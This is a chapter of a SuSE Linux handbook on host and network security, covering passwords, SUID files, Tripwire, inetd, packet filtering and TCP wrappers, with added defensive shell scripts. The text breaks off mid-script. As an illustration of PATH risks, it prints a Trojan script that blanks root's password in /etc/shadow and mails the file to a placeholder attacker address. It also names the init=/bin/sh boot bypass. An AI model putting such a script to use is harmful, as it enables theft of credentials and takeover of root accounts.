Part VII: Security and Getting Started

Chapter 18: Security is a Matter of Trust

18.1 Basics

Attacks and intruders from the Internet can no longer be ignored. Every day one hears of some new danger to the PC at home or to the entire company network, be it from attacks over the Internet or from viruses. In reality it is quite simple to take effective precautions against such threats. Before describing individual protection measures, it needs to be clarified what is actually meant by the word "security", and protection against what. The following six points make it clear that the security of a computer is a very sensible aim:

1. Protection of your resources
2. Access to information
3. Data availability
4. Data integrity
5. Confidentiality of sensitive information
6. Privacy

A complete security solution is necessary to prevent someone from taking advantage of weaknesses in any of these areas. You must protect your computer not only from outside attacks, but also against data loss from equipment failure, such as a hard drive crash or faulty backup tapes. Backing up on a truly regular basis is vital. In addition, the integrity of these backups should be checked from time to time (by actually restoring from them), to make sure they are reliable.

Your computer is at risk in the following ways:

* Users connected directly to the computer present the largest of all possible risks. The damage is not always intentional, but deliberate attacks by staff cannot be ruled out either.
* Communication links, via both local and worldwide networks, can be scanned using sniffers and other hacker tools. Open communication links make your computer vulnerable to a break-in, even from another part of the world.
* Direct physical access to your computer. It can be stolen, sabotaged or damaged by someone untrustworthy.
* Natural disasters. Computers are very prone to natural catastrophes.
* Hardware and software can be faulty, through design or concrete defects, thus not only threatening data, but also compromising security and possibly making the service completely unusable (see also Section 18.2 on page 418).
* Loss of storage media. Floppy disks, streamer tapes and hard drives can be damaged, lost or stolen.
* Electromagnetic radiation is emitted by your computer, monitor and even network cables. Sophisticated surveillance equipment can use this to monitor activity on your computer. This radiation is also carried through conduits and power cables, and, contrary to popular opinion, LCD monitors also give off radiation.

We concentrate here on the first two points, because a well-thought-out use of SuSE Linux can, to a large extent, remove these potential dangers. The other points are probably of less interest to a private user of SuSE Linux, but if a company network is being set up, those involved need to take them into consideration.

In Section 18.1.1 and Section 18.1.2 (page 417) we first point out the different types of attack which exist. Later, in Section 18.2 (page 418), we describe the relevant security tools in detail. Finally, at the end of the chapter, we outline some important general guidelines.

18.1.1 Local Security

He who sits in a glass house . . .

If you want to secure your data, you should begin with your personal computer. Even if your computer is not connected to the Internet, or only via dialup, you should take certain security precautions. To have your hard drive erased accidentally by a party guest can be a pain; even more so if it contains the only copy of your dissertation.

Passwords

As Linux is a multiuser operating system, it offers not only a means for administering users but also a complete authentication mechanism. Although it may not seem necessary at first, be sure to enter a password for every user on your computer (many references discuss how to choose one; Section 18.4 on page 426 gives some practical advice). This provides real protection for your computer against intruders.
You should take special care to give the user `root' a good password, because getting hold of the `root' password is one of the main targets for crackers. However, as long as others have physical access to your computer, the best password in the world is of no use: any person who can boot your computer can attack it using a boot disk. For this reason, you should disable the floppy as a boot device in your BIOS setup. For this to be of any use, you will also need to set a password for the BIOS. Do not forget this password! Without it, you will not be able to access your own BIOS, unless the BIOS is reset by means of a jumper setting.

If you use LILO (see Section 26 on page 113), set the option restricted together with a password (e.g. password=secure_password) in /etc/lilo.conf. Otherwise anyone sitting directly at the computer can compromise the system's security, for example by passing init=/bin/sh as a boot parameter and obtaining a root shell without any password. Obviously the password must be chosen carefully, and /etc/lilo.conf should be readable only by `root', since the password is stored there in clear text.

The package john in series sec (Security-related Software) contains a program which tries to "guess" passwords. A good system administrator can use it to root out weak passwords automatically, and then ask the users concerned to choose safe ones.

Permissions

All users should work with reduced permissions, so that they cannot harm the system, whether deliberately or not. Furthermore, you should avoid working as user `root' wherever possible, and you should be the only person who knows the `root' password.

Buffer Overruns

Forcing buffer overruns is one of the most popular methods crackers use to get `root' permissions on a computer. Also known as "stack smashing" vulnerabilities, these exploits feed a program more input (e.g. while entering text) than the buffer on its stack can hold, overwriting the saved return address with a value that launches code of the attacker's choosing, such as invoking a shell.
This is possible in programs which use fixed-size arrays and do not check for buffer overrun. The local targets that matter are programs with the SUID bit set. These are programs that are executed with the UID of their owner instead of that of the user who starts them. Normally programs such as passwd use SUID because they perform tasks not allowed to a normal user. For this reason, we have taken steps to minimize the number of SUID programs in SuSE Linux, as well as introducing further measures to protect these programs from attack. You should also monitor the relevant media and, when such loopholes are announced, obtain the available updates and patches as soon as possible.

Another form of attack on privileged programs and running services are so-called "link attacks". Through programs working carelessly in public directories such as /tmp (for example, opening a predictable file name that an attacker has already created as a symbolic link to somewhere else), it can be possible to divert data to totally different files, thus compromising the security of the system, or even bringing it down.

To reduce the number of SUID and SGID files in the system, you can, with YaST, in System Administration and Security Settings, change the selection File permissions changed to: to secure or paranoid. The permissions set by these can be seen in the files /etc/permissions.secure and /etc/permissions.paranoid. Before you use paranoid, however, you should ensure that the functionality of the system is not too restricted for your own requirements.

Because of its complexity and its huge amount of code, the X Window System (XFree86) has, on a number of occasions, attracted adverse attention. This problem has been defused in SuSE Linux because the server and libraries are no longer installed SUID `root'. Under certain conditions, however, there are drawbacks in the client-server communication: it is possible, for example, to intercept keyboard input, or to read window contents.
By observing rule 3 (page 426) and using Xauthority (command xauth), as well as avoiding xhost +, a high level of security can be achieved. Where possible, to start remote X programs, package ssh in series n (Network) should be used. If you plan to use ssh commercially, please look at the licenses in /usr/doc/packages/ssh/COPYING. ssh is available for almost any platform. However, this so-called X11 forwarding also has its own concealed risks (the remote side gains access to your local display), so you should consider not using it at all. For reasons of performance alone, the X Window System should never be installed on critical servers (i.e. file servers, ftp servers, routers, etc.).

Viruses and Trojan Horses

Until relatively recently, various types of viruses did their mischievous deeds, and not just on home computers, because copying and transporting software on floppy disks represented the ideal feeding ground for such programs. Fortunately, only two viruses for Linux have been discovered so far. Because software for Linux is hardly ever passed on in binary form, and since SuSE Linux itself can be considered virus free, there is no threat from viruses, providing you abide by rule 1 on page 426.

It is a different matter, however, for the increasingly common macro viruses, often sent by electronic mail (embedded in word processing documents). Since there is no Linux version of Microsoft Office, these can do no damage to SuSE Linux itself. The fact that SuSE Linux is increasingly used on mail servers as a "Mail Transfer Agent" offers an ideal opportunity to scan incoming and outgoing mail automatically for embedded viruses before they reach the clients that can run them.

"Trojan horses" are completely different from viruses. These are programs which claim to do one thing, but do some evil deed as well. For example, a shell login Trojan horse might collect user names and passwords in a file, and send this information on as e-mail. This may sound quite harmless, but it is no joke if credit card numbers or the PIN of a bank account are involved.
The chances of loading a Trojan horse from the Internet or receiving one by e-mail are pretty slim. It is, however, standard practice to leave behind some Trojans on an already compromised system (for instance a modified login or ls), in order to be able to access that machine again at any time. The existence of such programs is therefore a sure sign of a compromised machine.

While there is no definitive protection against viruses and Trojan horses, you can greatly reduce the likelihood of such attacks by installing a good virus scanner, and by copying both floppy disks and programs with great care. In addition, please see Section 18.4 on page 426. Programs such as tripwire (package tripwire, series sec, Security-related Software; see Tripwire in Section 18.2.1 on page 419) are useful in identifying modified files.

18.1.2 Network Security

Most computers these days no longer exist on their own ("standalone"). As Linux offers all the necessary capabilities, most Linux computers are on a LAN and may just as easily be connected to the Internet via a modem. Linux computers are also frequently used as gateways for complex subnets. These factors provide many avenues of attack from the network. You may avoid most of these attacks by setting up a firewall. The ports still in use will remain reachable, but they may be protected using the appropriate tools. The potential for being attacked during the 30 minutes each day you read your e-mail while connected to the Internet via dialup modem is small; systems which use leased lines, however, are reachable permanently and must be protected. Below, we describe the most important forms of attack.

Man in the Middle

"Man in the middle" attacks target a network path that is routed via one or more hosts. The intruder takes control of one of the routers, and can then sniff IP packets, redirect and replace them. As IP itself does not authenticate packets or their senders, it is quite easy to do this. It is hoped that this will change when the new IPv6 protocol standard comes into force.
The only protection against this kind of attack is a good set of cryptographic tools. These attacks occur mainly while accessing WWW sites or while exchanging mail. You should never use commands such as telnet and rsh, as they send an unencrypted password over the network, which lets anyone on the path read it. Switch to ssh to avoid this. E-mail can be encrypted using pgp. Even HTTP pages can be encrypted, using the SSL protocol (Secure Socket Layer), which is used with package apache in series n (Network). The quality of the encryption is only as good as the secure distribution of the keys, so take special care over this: a key or certificate obtained over an unauthenticated channel can itself have been replaced by the man in the middle.

Buffer Overflows, Part 2

After so-called "sniffing", the passive reading of data (such as login and password), buffer overflows are the most frequent kind of security compromise from the outside. The rule here is: every service accessible externally (e.g. mail, web server, POP3, etc.) represents a potential security problem. All services which are absolutely essential and cannot be switched off should, wherever possible, only be accessible to certain systems, via a firewall configuration of the Linux kernel (by means of ipchains). If this is not possible, you should try to replace the service with an especially secure version (e.g. package postfix instead of package sendmail). In addition to this, experts can run every service in its own chroot environment.

Denial of Service

Denial of service attacks attempt to overload a network service. Under certain conditions, not only the specific service attacked but the computer under attack as well may no longer be reachable. The packets which triggered the attack usually carry forged source addresses: denial of service is often used together with IP spoofing (see below) to conceal the source of the attack, and tracing the attacker is almost impossible. You need an effective means of protection.
When denial of service attacks are discovered, a patch protecting against them will usually be available for download over the Internet within hours. SuSE Linux has been patched to protect against every denial of service attack known up to the time of pressing the CD. The administrator must remain informed at all times about both attacks and available patches.

IP Spoofing

IP spoofing makes use of a weakness in the IP protocol: nothing checks that the source address of a packet is genuine. Thus, this address may be forged to cover the cracker's origin of attack. It is important to configure your router accordingly: packets arriving from the outside whose source address belongs to the internal network should be dropped, and only packets whose source address belongs to the internal network should be forwarded from the internal network to the outside. It should be the responsibility of each ISP to configure their routers properly so that such invalid packets will not be routed.

18.2 Tools

Let's take a look at the tools available for maintaining your system and checking for potential weak points. We would like to remind you at this point that the potential threat to a computer varies in each individual case. In a network protected by a firewall, it is clear that fewer protection and monitoring measures are needed than in an unprotected network.

18.2.1 Local Tools

Two great advantages of Linux over other operating systems are its stability and the fact that it is a multiuser system. However, the latter entails risks which should not be underestimated. In addition to the well-known permissions, there are certain parameters which can be exploited by the advanced user. Specifically, we mean the SUID bit. A program with this bit set automatically runs with the permissions of the user to whom it belongs. If the said program belongs to the superuser, and is started by any user, then it has the rights of the superuser on the running system. This might sound dangerous, but normally it is not. In fact there are several programs that rely on this capability.
The command ping, for example, needs raw network sockets, which only the superuser may open. This would mean that only user `root' would be allowed to execute this program. To avoid this, the SUID bit is set:

newbie@earth:/home/newbie > ls -l /bin/ping
-rwsr-xr-x   1 root     root        13216 Mar 17 16:36 /bin/ping

If you would like to know which programs have the SUID bit set and belong to user `root', enter the following command:

newbie@earth:/home/newbie > find / -uid 0 -perm -4000 -type f

This is one way of detecting "suspicious" programs. YaST enables you to set `Permissions will be set to:' (in `System administration' and `Security settings') to secure. The files which are affected by this can be seen in /etc/permissions.secure.

No one has the time to monitor his computer all the time. Fortunately there are tools to help you perform this tedious task. One of these tools deserves special mention, recommended as it is by CERT (Computer Emergency Response Team; see http://www.cert.dfn.de/dfncert/info.html): the tripwire package (package tripwire, series sec, Security-related Software).

Tripwire

Tripwire is easy to understand. It checks the system and saves the states and necessary information (permissions, owners, sizes, checksums) in a database. You specify the files which are to be checked in a configuration file. Tripwire does not check for infected files or system errors; it assumes that it is installed on a clean system. This is why it should be installed directly after the system has been set up and before it is connected to the network. You create the database as follows:

root@earth:root > /var/adm/tripwire/bin/tripwire -init

The paths to the database and configuration files, as they have been compiled into package tripwire on SuSE Linux, are shown in Table 18.1.

Table 18.1: Tripwire
  /var/adm/tripwire    Database and configuration file

The paths are chosen such that only the superuser (`root') may change to the Tripwire home directory. Ideally the database should be on a read-only filesystem (e.g. a write-protected floppy disk), otherwise a successful attacker could cover his tracks by manipulating the database. An example configuration file for Tripwire may be found in /usr/doc/packages/tripwire/tw.conf.example.linux. Help on the syntax of Tripwire may be found in the corresponding manpage tw.config. You may apply different checksum methods to different files and directories. After you have set up your configuration file, you may run tripwire regularly, for example, as a cron job.

SuSE Security Tools

SuSE Linux now has the following specially developed security packages to help you make your system more secure, and help you in controlling it:

The package firewall, series sec (Security-related Software) contains the script /usr/sbin/SuSEfirewall, which reads the configuration file /etc/rc.firewall and then generates restrictive filter lists by means of the program ipchains. More information can be found in Section 18.2.2 (Networking Tools).

The package secchk, series sec (Security-related Software) contains a number of small scripts which make special security checks on the system on a daily, weekly and monthly basis (such as the consistency of the password file, user files, cracking of weak passwords, modules which are loaded), and if changes have been made, the administrator is informed.

The package hardsuse, series sec (Security-related Software) contains the perl script /usr/sbin/harden_suse, which was developed to provide system administrators with a simple-to-use program to increase security. When it is started, nine yes/no questions are asked (for example, should all services be deactivated, user security increased, or SUID and SGID files minimized?), and according to the answers given, the system is then reconfigured.
You can find a log file with the changes in /etc/harden_suse.log, and backup copies of the modified files are also created. If the system subsequently does not perform as expected, the changes can be undone using the script /etc/security/undo_harden_suse.pl.

The package scslog, series sec (Security-related Software) contains a kernel module which, once loaded (you can automate this by adding it to the startup files, for example), logs all incoming and outgoing network connections.

The package secumod, series sec (Security-related Software) contains a further kernel module which prevents, or at least hinders, attacks on your system. At present this includes protection from symlink, hard link and pipe attacks; processes can, if desired, be prevented from being traced with strace, and more besides. Because this package is still very new and was not completely documented at the time of the handbook going to press, please have a look at the documentation of the package. Further tools are already being prepared.

Surfing the Log Files

The log files are a very important resource for gathering information about your system. These are files where programs leave a record of their work. At least one of them, /var/log/messages, should be checked regularly. Most of the logging in SuSE Linux is configured to write to this file. Normally you do not have the time to browse this huge file. Luckily there are tools which make it easier to read these log files. One of these is the program logsurfer, which continually checks log files according to directions in a configuration file. You may attach commands to certain occurrences in the log files. For example, if the word "fail" occurs, you may want to be informed via e-mail. logsurfer is a way to do this. logsurfer comes with an excellent manpage; see the manpage for logsurfer.conf (man 4 logsurfer.conf).

The PATH Variable and User `root'...
You may have noticed while working with SuSE Linux that the current directory is excluded from the search path of `root'. This is why, when you are `root', you have to add the prefix ./ to launch commands from the current directory. The reason that SuSE Linux is configured this way is illustrated in the example below:

* Suppose there is a user working on your system who creates the script in File contents 18.2.1.

  #!/bin/sh
  # Empty the password field of root's entry in /etc/shadow ...
  sed 's;\(root:\)[^:]*\(:.*\);\1\2;' /etc/shadow > /etc/shadow.tmp && \
      mv /etc/shadow.tmp /etc/shadow
  # ... tell the attacker, and finally behave like ls so nothing looks odd.
  mailx -s "Root Account hacked" hacker@hackit.org < /etc/shadow
  ls "$@"

  File contents 18.2.1: Shell script to hack the root account

* This script is then moved to /tmp/ls.
* Now, if the current directory `.' appears in root's PATH before /bin, and `root' changes to /tmp and types ls, he will not launch /bin/ls, but our little script /tmp/ls instead.

The result of executing this script is that the `root' password is removed. Even worse, the script also sends the user who wrote it an e-mail, informing him that the password has been removed. Now he may freely log in as user `root'. The consequences may be very unpleasant ;-). If the current directory was not in the search path, this could only have happened if you had explicitly typed ./ls. This, by the way, is an example of a Trojan horse, as described above (see Viruses and Trojan Horses in Section 18.1.1 on page 416).

18.2.2 Networking Tools

It is instructive to observe a host that is connected to a network. Below, we want to point out how you can protect your Linux computer from attacks through the network.

inetd

An elementary approach to this is a carefully thought-out selection of the ports which inetd (the Internet "super server") makes available. In SuSE Linux, some of the "vulnerable" services are disabled by default. These include the so-called "internal services" of inetd. The configuration file is /etc/inetd.conf. Other services, too, should be enabled or disabled with care, according to requirements.
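Before editing /etc/inetd.conf by hand it helps to see what is actually switched on. The following shell script is an added example, not part of the SuSE manual or of any SuSE package: it lists the enabled entries of an inetd.conf file and flags those whose protocols transmit the login password in the clear. The list of cleartext services and the sample configuration (including the popper entry) are constructed for the example.

```shell
#!/bin/sh
# Added example: audit an inetd.conf for enabled services and for services
# whose protocols send the login password unencrypted. The service list is
# an assumption made for this example; extend it to match your own site.

CLEARTEXT_SERVICES="ftp telnet shell login exec pop2 pop3 imap"

# inetd_enabled FILE: print "service program [args]" for every active entry.
# Field 1 is the service name; fields 7 onward are the server program and its
# arguments. Lines ending in a backslash are continuations and are joined first.
inetd_enabled() {
    sed -e :a -e '/\\$/N; s/\\\n//; ta' "$1" |
    awk '/^[ \t]*#/ { next }
         /^[ \t]*$/ { next }
         { printf "%s", $1; for (i = 7; i <= NF; i++) printf " %s", $i; print "" }'
}

# inetd_cleartext FILE: the enabled services that appear in CLEARTEXT_SERVICES.
inetd_cleartext() {
    inetd_enabled "$1" | awk -v list="$CLEARTEXT_SERVICES" '
        BEGIN { n = split(list, a, " "); for (i = 1; i <= n; i++) flag[a[i]] = 1 }
        ($1 in flag) { print $1 }'
}

# Constructed sample configuration: the manual's list, shell commented out,
# plus a POP3 entry of the kind that is often enabled by default.
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
# inetd.conf sample (constructed for this example)
ftp     stream  tcp  nowait  root    /usr/sbin/tcpd        wu.ftpd -a
telnet  stream  tcp  nowait  root    /usr/sbin/tcpd        in.telnetd
#shell  stream  tcp  nowait  root    /usr/sbin/tcpd        in.rshd -L
finger  stream  tcp  nowait  nobody  /usr/sbin/tcpd        in.fingerd -w
ident   stream  tcp  wait    nobody  /usr/sbin/in.identd   in.identd \
        -w -e -t120
pop3    stream  tcp  nowait  root    /usr/sbin/tcpd        /usr/sbin/popper -s
EOF

echo "Enabled services:"
inetd_enabled "$SAMPLE"
echo
echo "Enabled services that carry cleartext passwords (disable them, or use ssh):"
inetd_cleartext "$SAMPLE"
rm -f "$SAMPLE"
```

Run it against the real file with inetd_cleartext /etc/inetd.conf; every service it prints is a candidate for a leading # in that file, followed by a kill -HUP of inetd.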
We recommend that you take a look at the configuration files, since, for example, POP3 and other services are enabled by default! A list of services that is completely sufficient for nearly all cases is shown in File contents 18.2.2.

  ftp     stream  tcp  nowait  root    /usr/sbin/tcpd        wu.ftpd -a
  telnet  stream  tcp  nowait  root    /usr/sbin/tcpd        in.telnetd
  shell   stream  tcp  nowait  root    /usr/sbin/tcpd        in.rshd -L
  login   stream  tcp  nowait  root    /usr/sbin/tcpd        in.rlogind
  finger  stream  tcp  nowait  nobody  /usr/sbin/tcpd        in.fingerd -w
  ident   stream  tcp  wait    nobody  /usr/sbin/in.identd   in.identd \
          -w -e -t120

  File contents 18.2.2: Example configuration for inetd

Think hard about whether you really need services such as telnet, shell and login. The disadvantage of each of these services is that passwords are transmitted without encryption. Reading these passwords is not difficult; there are tools which make this kind of attack trivially easy. Never, under any circumstances, allow remote `root' access! Once again, we direct your attention to the "Secure Shell" (package ssh). It encrypts everything, even the password.

SuSE Packet Filter Firewall

Questions on the SuSE Packet Filter Firewall cannot be answered by installation support.

The SuSE Packet Filter Firewall (package firewall, series sec (Security-related Software)) is activated and configured by the file /etc/rc.firewall. Individual entries are documented and commented in the file itself. To help first-time users into the intricacies of firewalls as well, here are some basic explanations and hints on using the SuSE Packet Filter Firewall.

The family of protocols used for communication via the Internet is known as "TCP/IP". TCP/IP stands for Transmission Control Protocol and Internet Protocol. TCP/IP is nowadays available on almost all hardware, operating systems and network platforms. It was developed for the United States Department of Defense (DoD) and presented to the public for the first time in 1978.
A TCP/IP network transfers data between computer systems by turning the data into packets and sending these packets. Each packet begins with a header containing various control information, such as the address of the target computer. This header is then followed by the data to be transmitted. If, for example, a file is to be transported to another computer via the network, the contents of this file are split into a series of packets. These packets are then sent to the target computer.

The error-free transmission of the packets is guaranteed by the Transmission Control Protocol (TCP). It ensures that the packets arrive in the right order, retransmits lost ones, and reports errors which cannot be corrected to the application using it. TCP is the transport layer, running on top of IP. A further transport protocol of the family is UDP. With UDP there is no guarantee of error-free transmission, which makes transmission faster than with TCP. This means, however, that when using UDP you must check in other ways (through the application) that transmission errors are detected and corrected.

An IP address (IP version 4) is a 32-bit value. To make IP addresses more readable they are written in 8-bit portions, separated by dots (e.g. 192.168.0.20). In order for a computer to maintain a number of connections simultaneously, and to keep these connections separate from each other, the communication takes place via so-called ports (0 to 65535). Different connections are assigned to these ports: the header of a TCP or UDP packet carries the source and target ports, and the IP header in front of it carries the source and target addresses of the computers themselves. A number of the ports from 0 to 65535 are reserved for specific services (see also /etc/services). TCP port 23 is, for instance, the port for telnet connections. A further specification concerns ports 0 to 1023 (TCP and UDP).
They are the so-called privileged ports. Only programs running with system administrator privileges can offer their services on these ports, so a service answering on a privileged port can be assumed to have been started by the administrator (see /etc/services). The ports 1024 to 65535 are referred to as non-privileged ports. The difference can be illustrated with the somewhat simplified example of a file transfer with ftp. An FTP server provides its services on TCP port 21. If an FTP client on the computer with the IP address 192.168.3.5 (client) is started with the command

newbie@earth:/home/newbie > ftp 192.168.3.16

then the client creates a TCP connection to port 21 of the computer with the IP address 192.168.3.16 (server). On port 21 the FTP server answers and processes the user identification (login name and password query). The FTP commands which the user enters after logging in are also transmitted via this connection. If data is to be transferred from the server to the client (after entering the command ls or get), the server independently creates a connection from its port 20 to a non-privileged port of the client. The actual data is then transmitted via this connection. This is also why a packet filter on the client side which blocks all incoming connections breaks this "active" mode of ftp.

TCP/IP was designed for very large networks, and for this reason contains mechanisms for structuring a network. The entire 32-bit wide address space can be divided into "subnets". A subnet is formed by a number of bits (beginning from the left) being defined as the network address of the subnet. For the subnet with the address 192.168.3.0, the first 24 bits of the address form the network address. The "subnet mask" (network mask) defines how many bits of an address form the network address. The subnet mask 255.255.255.0, for example, specifies that the computer with the address 192.168.3.5 can be found in the subnet with the address 192.168.3.0. Subnets within a large network are usually connected by routers. Routers are either specialised machines or sufficiently well-equipped computers which ensure that packets find the correct path to their destination. The counterpart to the network address is the so-called broadcast address, in which all the host bits (those not covered by the subnet mask) are set. Via the broadcast address, all computers of a subnet are reachable. Example: all computers in the network 192.168.3.0 can be reached via the broadcast address 192.168.3.255.

If a connection to the Internet has been made, then the computer is part of the worldwide Internet. Each time a connection to the provider is activated, that computer is reachable from the Internet. Now you need to take steps to prevent unauthorized access from the Internet. This task is taken on by the SuSE Packet Filter Firewall.

Packet filters are network level firewalls. They make fundamental decisions on the basis of source addresses, target addresses and ports in specific IP packets. A simple router or the SuSE Packet Filter Firewall are traditional network level firewalls. Since they are not intelligent enough to determine what significance the contents of an IP packet have and where it really originates from, they do not offer sufficient protection against all attacks. Modern network level firewalls (for example, SINUS Firewall I for Linux, http://www.sinus-firewall.org) are more highly developed, and gather internal information on the status of connections which run via them, the contents of data streams, etc. Application level firewalls (e.g. TIS Firewall Toolkit), on the other hand, are usually computers on which proxy servers run and which carefully log and examine the data traffic running over them. Since the proxy servers are programs which run on the firewall, they are ideally suited for logging and access control.

Where should the SuSE Packet Filter Firewall be used?
For networks with an increased need for protection (strictly speaking, anywhere where personal information is stored), application level firewalls are still the first port of call, due to the way they function. For such networks the SuSE Packet Filter Firewall does not provide sufficient protection. The SuSE Packet Filter Firewall is intended for protecting a private PC, a mini-network at home or a workstation within a trusted network. You should only use the SuSE Packet Filter Firewall to protect company networks if you know exactly what you are doing (see the sources listed below). To set up and maintain firewalls, an in-depth knowledge of networks and the protocols used in them is essential. This knowledge ultimately cannot be replaced by a graphical interface or a pre-configured setup, such as that provided by the SuSE Packet Filter Firewall.

Documentation on the SuSE Packet Filter Firewall can be found in /usr/doc/packages/firewall and /etc/rc.firewall. If you want to tackle the subject of firewalls in more depth, we recommend experimenting and studying the following sources:

* The Firewall handbook for Linux 2.0 and 2.2 by Guido Stepken provides almost everything you need to know in order to construct a secure firewall with Linux, from detailed technical information to the description of typical weak points and errors. The firewall handbook is required reading, and is only available online (http://www.little-idiot.de/firewall/).
* The Freefire project is a good starting point for all those who are interested in firewalls on a free software basis (http://sites.inka.de/sites/lina/freefire-l/).

TCP Wrappers

TCP wrappers (tcpd) enable you to restrict certain services to particular networks or IP addresses. tcpd is activated in SuSE Linux by default. You may see this in column six of File contents 18.2.2 (page 422) and in /etc/inetd.conf: the entry names /usr/sbin/tcpd, which in turn starts the actual server program.
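The subnet arithmetic from the firewall explanation above and the lookup order of tcpd (/etc/hosts.allow is consulted first, then /etc/hosts.deny, and a client matching neither is accepted) can both be written down in a few lines of shell. The script below is an added example, not code from the SuSE manual or from the tcp_wrappers package; it implements only a subset of tcpd's client patterns (ALL, a single address, a prefix ending in a dot, and net/mask), and the rule files it creates are constructed for the demonstration.

```shell
#!/bin/sh
# Added example: subnet arithmetic and tcpd's allow/deny decision in POSIX sh.
# Only a subset of tcpd's client patterns is implemented (see client_matches);
# the rule files at the bottom are constructed for this example.

# ip_to_int A.B.C.D -> 32-bit integer
ip_to_int() {
    set -- $(printf '%s' "$1" | tr . ' ')
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# int_to_ip N -> dotted quad
int_to_ip() {
    echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# network_address IP MASK: the network part (IP AND MASK)
network_address() {
    int_to_ip $(( $(ip_to_int "$1") & $(ip_to_int "$2") ))
}

# broadcast_address IP MASK: network part with every host bit set (IP OR NOT MASK)
broadcast_address() {
    int_to_ip $(( $(ip_to_int "$1") | (~$(ip_to_int "$2") & 4294967295) ))
}

# in_subnet IP NET MASK: true when IP lies inside NET/MASK
in_subnet() {
    [ "$(network_address "$1" "$3")" = "$(network_address "$2" "$3")" ]
}

# client_matches PATTERN IP: ALL, an exact address, a prefix ending in a dot
# (192.168.3.) or net/mask (192.168.3.0/255.255.255.0). Hostnames are not handled.
client_matches() {
    case $1 in
        ALL) return 0 ;;
        */*) in_subnet "$2" "${1%/*}" "${1#*/}" ;;
        *.)  case $2 in "$1"*) return 0 ;; *) return 1 ;; esac ;;
        *)   [ "$1" = "$2" ] ;;
    esac
}

# file_matches FILE DAEMON IP: does any "daemon_list : client_list" line match?
# A missing file matches nothing, exactly like a missing /etc/hosts.deny.
file_matches() {
    [ -f "$1" ] || return 1
    found=$(sed 's/#.*//' "$1" | while IFS=: read -r daemons clients; do
        for d in $daemons; do
            [ "$d" = ALL ] || [ "$d" = "$2" ] || continue
            for c in $clients; do
                if client_matches "$c" "$3"; then echo yes; exit 0; fi
            done
        done
    done)
    [ "$found" = yes ]
}

# tcpd_access ALLOWFILE DENYFILE DAEMON IP -> "allow" or "deny", in tcpd's order:
# hosts.allow first, then hosts.deny, and a client listed in neither is allowed.
tcpd_access() {
    if file_matches "$1" "$3" "$4"; then echo allow
    elif file_matches "$2" "$3" "$4"; then echo deny
    else echo allow
    fi
}

# Constructed rule files: the local subnet may use ssh and ftp, nobody else anything.
ALLOW=$(mktemp); DENY=$(mktemp)
printf 'sshd in.ftpd : 192.168.3.0/255.255.255.0\n' > "$ALLOW"
printf 'ALL : ALL\n' > "$DENY"

echo "network of 192.168.3.5/255.255.255.0  : $(network_address 192.168.3.5 255.255.255.0)"
echo "broadcast of 192.168.3.5/255.255.255.0: $(broadcast_address 192.168.3.5 255.255.255.0)"
echo "sshd from 192.168.3.5       : $(tcpd_access "$ALLOW" "$DENY" sshd 192.168.3.5)"
echo "sshd from 10.0.0.7          : $(tcpd_access "$ALLOW" "$DENY" sshd 10.0.0.7)"
echo "in.telnetd from 192.168.3.5 : $(tcpd_access "$ALLOW" "$DENY" in.telnetd 192.168.3.5)"
rm -f "$ALLOW" "$DENY"
```

The last call shows why the closing ALL : ALL line in hosts.deny matters: without it, in.telnetd from the local subnet would be accepted even though no line in hosts.allow mentions it, because the default for an unlisted client is "allow".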
The concept is quite simple: tcpd launches the services that you actually need, first checking to see if the client is authorized to access them. This access control takes place via the two files /etc/hosts.allow and /etc/hosts.deny:

* Access is granted if a combination of client and service is found in the file /etc/hosts.allow.
* Otherwise, access is denied if such a combination is found in the file /etc/hosts.deny.
* If there is no matching rule in either file, access is allowed.

The first rule to be found is used. If access to, for example, the telnet port is allowed in /etc/hosts.allow, it will be allowed even if it is denied in /etc/hosts.deny. Note the default: a missing or empty /etc/hosts.deny means every client is accepted, so a restrictive setup usually ends /etc/hosts.deny with ALL: ALL and lists the permitted clients explicitly in /etc/hosts.allow. The syntax for making entries in these files is described in the manpage for hosts_access (man 5 hosts_access).

There is an alternative to TCP wrappers called xinetd, which combines the features of inetd and tcpd. One disadvantage of xinetd is that the configuration files of inetd and xinetd are incompatible. Only one Internet "super server" (inetd or xinetd) may be started; you have to decide which one to use.

In the series sec (Security-related Software) further programs can be found which can be of help in building a secure system. Just browse through the packages there.

18.3 Security in SuSE Linux

SuSE offers the following services to accomplish the highest possible security-oriented distribution:

Two mailing lists are available for everyone:

* suse-security-announce contains SuSE notifications of security problems.
* suse-security contains notifications and is open to public discussion.

To subscribe to either of the mailing lists, send an electronic mail to majordomo@suse.com with the contents

subscribe suse-security

or

subscribe suse-security-announce

Central notification of new security problems: if you find a new security problem (be sure to check the available updates beforehand), please send an electronic mail to security@suse.de with a description of the problem. We will attend to it immediately. You can encrypt the mail with the package pgp. Our public pgp key (fingerprint 73 5F 2E 99 DF DB 94 C4 8F 5A A3 AE AF 22 F2 D5) can be downloaded from http://www.suse.de/security; compare the fingerprint of the downloaded key with the one printed here before using it.

18.4 General Rules

1. Only use `root' for administrative purposes. You should create a user for your daily work.
2. Try to avoid the commands telnet, rlogin and rsh.
3. Use ssh instead, if you want to work remotely.
4. Deactivate all network services that are not needed.
5. Make sure you have up-to-date versions of relevant packages such as bind, sendmail and ssh.
6. Remove SUID and SGID bits from all files in the system that are not essential for normal users to work with.
7. Check your log files regularly.
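Rules 6 and 7 are easier to keep if the check is scripted. The following shell script is an added example, not code from the SuSE manual, the tripwire package or any SuSE package: in the spirit of the find command and of Tripwire in Section 18.2.1, it records the SUID/SGID files under a directory tree together with SHA-256 checksums of the files named in a configuration file, and a later run reports what appeared, vanished or changed. It assumes sha256sum (GNU coreutils or busybox) is available; the directory layout and sample files are constructed for the demonstration. On a real system the database would be kept on read-only media, as the Tripwire section recommends.

```shell
#!/bin/sh
# Added example: baseline-and-compare for SUID/SGID files and file checksums.
# ROOT, CONFIG and DBFILE are parameters; the sample tree at the bottom is
# constructed. Requires sha256sum (GNU coreutils or busybox).

# suid_list ROOT: regular files under ROOT (same filesystem) with the SUID or
# SGID bit set, sorted so that two listings can be compared with diff.
suid_list() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print | sort
}

# checksum_list CONFIG: "hash  path" for each path in CONFIG (one per line,
# '#' starts a comment), much as a Tripwire database records file contents.
checksum_list() {
    sed 's/#.*//; /^ *$/d' "$1" | while IFS= read -r path; do
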